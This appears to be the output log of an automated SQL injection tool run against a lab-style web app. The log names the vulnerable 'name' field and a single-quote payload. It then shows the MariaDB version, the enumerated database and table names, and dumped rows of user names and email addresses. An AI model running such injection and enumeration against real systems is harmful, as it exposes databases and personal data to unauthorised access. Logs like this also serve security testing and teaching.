Vector vulnerable: name
Payload Used: '
Version of database engine:
Database Error: <br>(1305, &#39;FUNCTION prod.sqlite_version does not exist&#39;)
Results
ID: 11.1.2-MariaDB-1:11.1.2+maria~ubu2204, Name: None, Email: None
Results
ID: information_schema, Name: None, Email: None
ID: performance_schema, Name: None, Email: None
ID: mysql, Name: None, Email: None
ID: sys, Name: None, Email: None
ID: prod, Name: None, Email: None
Results
ID: autre_truc, Name: None, Email: None
ID: users, Name: None, Email: None
Results
ID: 1, Name: Alice, Email: alice@email.com
ID: 2, Name: Bob, Email: bob@email.com
ID: 3, Name: Charlie, Email: charlie@email.com
Results
ID: 1, Name: Alicefdsfsd, Email: ali42ce@email.com
ID: 2, Name: Bfsdfsdob, Email: bob@emaiddl.com
ID: 3, Name: dffsd, Email: charlie@efdsmail.com
